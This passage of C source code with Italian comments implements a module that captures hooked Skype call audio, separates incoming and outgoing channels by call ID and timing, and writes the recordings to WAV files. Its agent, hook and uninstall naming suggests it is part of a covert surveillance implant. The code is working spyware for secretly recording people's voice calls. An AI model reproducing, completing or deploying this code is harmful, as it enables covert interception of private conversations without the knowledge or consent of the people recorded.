		_snprintf_s(epoch_name, sizeof(epoch_name), _TRUNCATE, "%s_IN_%.8X%.8X_%.8X%.8X", call_id, channel_time_start[in_out].dwHighDateTime, channel_time_start[in_out].dwLowDateTime, channel_time_last[in_out].dwHighDateTime, channel_time_last[in_out].dwLowDateTime);

	return epoch_name;
}


// Calcola la differenza fra due FILETIME in decimi di secondo
int TimeDiff(FILETIME *elem_1, FILETIME *elem_2)
{
	long long elem64_1=0, elem64_2=0;
	int diff;

	elem64_1 = elem_1->dwHighDateTime; elem64_1<<=32;
	elem64_2 = elem_2->dwHighDateTime; elem64_2<<=32;
	elem64_1 += elem_1->dwLowDateTime;
	elem64_2 += elem_2->dwLowDateTime;
	elem64_1 -= elem64_2;
	elem64_1 /= 1000000;
	diff = (int) elem64_1;

	return diff;
}


DWORD __stdcall PM_SkypeRecordDispatch(BYTE *msg, DWORD dwLen, DWORD dwFlags, FILETIME *time_nanosec)
{
	DWORD in_out = INPUT_ELEM;

	// Se il monitor e' stoppato non esegue la funzione di dispatch
	if (!bPM_SkypeRecordStarted)
		return 0;

	// Se e' un messaggio di Nuovo Identificativo Chiamata...
	if (dwFlags & FLAGS_CALL_ID) {
		DWORD i;
		// Se e' uguale al vecchio CallID non fa nulla
		if (!strcmp(CallerID, (char *)msg))
			return 1;

		// Salva code pendenti (se presenti) di una precedente chiamata
		for (i=0; i<2; i++) {
			if (sample_size[i]>0) {
				SaveWav(SkypeGetFileName(CallerID, i), wave_list_head[i], sample_size[i]);
				FreeList(&(wave_list_head[i]));
				sample_size[i] = 0;
			}
		}
		// Modifica il CallerID per i futuri salvataggi
		_snprintf_s(CallerID, sizeof(CallerID), _TRUNCATE, "%s", msg);
		Log_Sanitize(CallerID);
		return 1;
	}

	// Se non e' un messaggio di CallID allora determina da dove viene il sample
	if (dwFlags & FLAGS_OUTPUT)
		in_out = OUTPUT_ELEM; // Di default e' su INPUT_ELEM

	// Se e' troppo distante dall'ultimo sample, lo salva in un file differente
	// differente (appartiene a una chiamata diversa).
	// Se sample size e' > 0 sono sicuro che channel_time_last sia stato valorizzato
	if (sample_size[in_out]>0 && abs(TimeDiff(time_nanosec, &channel_time_last[in_out])) > CALL_DELTA) {
		SaveWav(SkypeGetFileName(CallerID, in_out), wave_list_head[in_out], sample_size[in_out]);
		FreeList(&(wave_list_head[in_out]));
		sample_size[in_out] = 0;
	}

	// Se e' il primo messaggio che stiamo mettendo su quel canale, 
	// lo prendiamo come timestamp di inizio (approssimativamente)
	if (!wave_list_head[in_out]) {
		channel_time_start[in_out].dwHighDateTime = time_nanosec->dwHighDateTime;
		channel_time_start[in_out].dwLowDateTime = time_nanosec->dwLowDateTime;
	}
	// Setta l'ultimo time-stamp
	channel_time_last[in_out].dwHighDateTime = time_nanosec->dwHighDateTime;
	channel_time_last[in_out].dwLowDateTime = time_nanosec->dwLowDateTime;

	// Lo inserisce nella lista 
	if (InsertList(&(wave_list_head[in_out]), msg, dwLen))
		sample_size[in_out] += dwLen;

	// Se ha superato la dimensione del sample, salva su file
	// e libera la lista
	if (sample_size[in_out] > max_sample_size) {
		SaveWav(SkypeGetFileName(CallerID, in_out), wave_list_head[in_out], sample_size[in_out]);
		FreeList(&(wave_list_head[in_out]));
		sample_size[in_out] = 0;
	}

	return 1;
}


DWORD __stdcall PM_SkypeRecordStartStop(BOOL bStartFlag)
{
	char codec_path[DLLNAMELEN];

	// Se l'agent e' gia' nella condizione desiderata
	// non fa nulla.
	if (bPM_SkypeRecordStarted == bStartFlag)
		return 0;

	// Allo start vede se non abbiamo ancora il codec caricato
	// Se manca, cerca di caricarlo.
	if (bStartFlag && !codec_handle)
		codec_handle = ResolveCodecSymbols(HM_CompletePath(H4_CODEC_NAME, codec_path));
	
	// Cambia lo stato dell'agente
	bPM_SkypeRecordStarted = bStartFlag;
	AM_IPCAgentStartStop(PM_SKYPERECORDAGENT, bStartFlag);

	return 1;
}


DWORD __stdcall PM_SkypeRecordInit(BYTE *conf_ptr, BOOL bStartFlag)
{
	DWORD *pdwparam;
	// Inizializza la dimensione dei sample su disco
	// e il fattore di compressione
	if (conf_ptr) {
		pdwparam = (DWORD *)conf_ptr;
		max_sample_size = *pdwparam;
		pdwparam++;
		compress_factor = *pdwparam;
	} else {
		// Inizializza di default a DEFAULT_SAMPLE_SIZE
		max_sample_size = DEFAULT_SAMPLE_SIZE;
		compress_factor = DEFAULT_COMPRESSION;
	}

	PM_SkypeRecordStartStop(bStartFlag);
	return 1;
}

DWORD __stdcall PM_SkypeRecordUnregister()
{
#define MAX_FREE_TRIES 5
#define FREE_SLEEP_TIME 100
	DWORD i;
	if (codec_handle) {
		// Cerca a tutti i costi di chiudere la libreria
		// (anche se dovrebbe riuscire al primo tentativo)
		for (i=0; i<MAX_FREE_TRIES; i++) {
			// Non vi sono race sulla libreria visto che il thread di dispatch
			// e' bloccato a questo punto (in maniera sicura) e la Start (dove
			// carica la libreria) viene sempre eseguita da una action (cosi' 
			// come la unregisterm che e' esguita dall'action uninstall).
			if (FreeLibrary(codec_handle))
				break;
			Sleep(FREE_SLEEP_TIME);
		}
		codec_handle = NULL;
	}
	return 1;
}

void PM_SkypeRecordRegister()
{
	sprintf(CallerID, "SkypeCallID");
	// L'hook viene registrato dalla funzione HM_InbundleHooks
	AM_MonitorRegister(PM_SKYPERECORDAGENT, (BYTE *)PM_SkypeRecordDispatch, (BYTE *)PM_SkypeRecordStartStop, (BYTE *)PM_SkypeRecordInit, (BYTE *)PM_SkypeRecordUnregister);

	// Inizialmente i monitor devono avere una configurazione di default nel caso
	// non siano referenziati nel file di configurazione (partono comunque come stoppati).
	PM_SkypeRecordInit(NULL, FALSE);
}